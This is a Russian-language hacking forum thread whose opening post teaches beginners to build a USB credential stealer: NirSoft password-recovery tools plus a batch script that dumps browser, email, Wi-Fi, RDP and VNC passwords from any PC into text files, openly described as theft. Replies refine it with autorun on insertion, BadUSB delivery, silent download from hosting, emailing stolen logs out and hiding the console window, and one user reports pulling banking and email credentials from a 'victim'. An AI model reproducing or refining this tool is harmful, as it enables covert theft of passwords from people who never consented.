Статья Создаем USB stealer паролей (для начинающих)

U

Ubop0202

Приветсвую!
Мой первый пост, так что не судите строго :)
В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.

bad_usb.jpg

Что же нам для этого надо:
1) usb флюшка
2) продукты от Nirsoft'a, которые можно скачать бесплатно с офф. сайта :
  • MessenPass
  • Mail PassView
  • Protected Storage PassView
  • Dialupass
  • BulletsPassView
  • Network Password Recovery
  • SniffPass Password Sniffer
  • RouterPassView
  • PstPassword
  • WebBrowserPassView
  • WirelessKeyView
  • Remote Desktop PassView
  • VNCPassView
После того, как вы скачали вышеуказанный софт, его следует перенести на сам флеш-диск.

3) Открываем блокнот, после чего вставляем в него следующее содержимое:

Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
после сохранив его как backup.bat, копируем на флешку.

4) Вуаля, вы восхитительны! Можете вставить флешку в любой ПК, запустить backup.bat и у вас создадутся *.txt файлы с паролями браузеров, wifi, vnc и т.д.

От автора:
1) в чем плюс данного метода? вышеуказанный софт, вы качаете с офф.сайта (собственно уже можно быть уверенным, что к ним не привязаны другие вирусы от автора статьи)
2) также можно воспользоваться данной тулзой: , если будет интересно запилю howto на русском языке.
 
V

Valkiria

Наверное, можно добавить файл autorun.inf в корень флэшки.
Если у жертвы на компе не отключен автозапуск со сменных носителей, то и запускать вручную ничего не нужно ))

А как отреагирует на запуск этих программ UAC ?
 
Глюк

Глюк

Red Team
03.01.2018
1 029
1 796
также можно воспользоваться данной тулзой: , если будет интересно запилю howto на русском языке.
конечно интересно....
я очень давно делал подобную флешку для виндовс систем на лазанье... где то на старых дисках даже батник должен остаться... но время бежит и всё меняется. может я безнадёжно отстал от прогресса.... )))
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
575
Наверное, можно добавить файл autorun.inf в корень флэшки.
Если у жертвы на компе не отключен автозапуск со сменных носителей, то и запускать вручную ничего не нужно ))

А как отреагирует на запуск этих программ UAC ?
начиная с виндовс 7 отключено вендором. после чего обновление функция была отключена на Хр и висте
 
  • Нравится
Реакции: Vertigo и Ubop0202
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
575
конечно интересно....
я очень давно делал подобную флешку для виндовс систем на лазанье... где то на старых дисках даже батник должен остаться... но время бежит и всё меняется. может я безнадёжно отстал от прогресса.... )))
на странице проекта всё описанно, работает не плохо но некоторы АВ ругаются.
 
  • Нравится
Реакции: Глюк
Xulinam

Xulinam

Green Team
02.03.2017
679
185
неплохо так пароли вспоминает) однако от vk и фэйсбука не вспомнила))
 
S

swap3r

Well-known member
06.11.2016
71
57
интегрировать с атаками типа badusb будет в самый раз. стилер, скачивающий в тихом режиме с некоего хостинга заранее подготовленный sfx архив с утилитами нирсофта, быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл (можно добавить консольную мейл отправлялку в архив и команду на ее запуск в батник, как-то так)
 
  • Нравится
Реакции: Qmakake и Tihon49
Xulinam

Xulinam

Green Team
02.03.2017
679
185
быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл
При запуске )) появляеться Окно ДОСА!!!!!!!!! и если он не находит от куда востанавливать пароли то пишет ошибку!! тоесть не заметно это не прокатит(
 
S

swap3r

Well-known member
06.11.2016
71
57
При запуске )) появляеться Окно ДОСА!!!!!!!!! и если он не находит от куда востанавливать пароли то пишет ошибку!! тоесть не заметно это не прокатит(
только что проверил на тестовом скрипте из нескольких строчек. Действительно окошко консоли появляется, но ненадолго. Если перенаправить вывод в файл (вот так ">"), то, по идее не должно появляться, либо появиться совсем ненадолго. ошибки можно либо перенаправлять в файл, либо "пофиксить" их в екзешниках нирфовтового софта (удалив лишние диалоги в ресурсах, например).
Кому надо - тот найдет правильный путь :)
 
  • Нравится
Реакции: Tihon49 и Xulinam
Xulinam

Xulinam

Green Team
02.03.2017
679
185
либо "пофиксить" их в екзешниках нирфовтового софта (удалив лишние диалоги в ресурсах, например).
Кому надо - тот найдет правильный путь :)
так это понятно)) просто я говорю что вижу по факту)))))
 
Xulinam

Xulinam

Green Team
02.03.2017
679
185
Нефига в текстовой файл не записывается он) Тупа открылись все проги и че? А авто не сохраняет, доработать надо батник
Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
все отлично сохранет проверенно на вин10
 
  • Нравится
Реакции: ferentar
A

Asset030303

Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
все отлично сохранет проверенно на вин10
Я только что запустил для одной проге как легкий пример, например тот же WebBrowserPassView, он не сохраняет все найденные пароли в текстовой док, а просто откроет прогу и рядом его cfg файл и тогда какой смысл самого батника !

mailpv также не работает, просто пустое окно открывается проги и все)
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
575
кстати очень похоже на перевод статьи
 
☠xrahitel☠

☠xrahitel☠

Green Team
09.12.2016
169
274
вот это хорошо тащит у меня вытащила от киви,хостинг,gmail,банкмм tinkoff.ru,яндекс,vk.com,blockchain.info,yahoo.com,mail,amazon.com,rambler.ru
осталось терпиле подгрузить ну это Вы сами у же.
 
S

subvert

К удалению 21.01.2019
10.09.2017
1
0
вот это хорошо тащит у меня вытащила от киви,хостинг,gmail,банкмм tinkoff.ru,яндекс,vk.com,blockchain.info,yahoo.com,mail,amazon.com,rambler.ru
осталось терпиле подгрузить ну это Вы сами у же.
не работает с кириллическим именем пользователя Windows.
 
☠xrahitel☠

☠xrahitel☠

Green Team
09.12.2016
169
274
не работает с кириллическим именем пользователя Windows.
можно прочитать но там старая версия тащит от жабы да учетак все что есть на компе
если за были пароль от своего дедика потерянного в 2016 не х.. страшного.
 
  • Нравится
Реакции: Tihon49
wittmann404

wittmann404

Active member
28.03.2016
37
8
Какая команда в батнике должна быть чтобы записывал все в файлик?
 
Sunnych

Sunnych

Mod. Forensics
Gold Team
01.06.2018
223
1 036
Приветсвую!
Мой первый пост, так что не судите строго :)
Nirsoft распознается Windows 10 как вирусные программы :-( проверенно давным давно, только что перепроверил, без внесения в исключения файлы Nirsoft удаляются
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
575
  • Нравится
Реакции: Sunnych
Мы в соцсетях: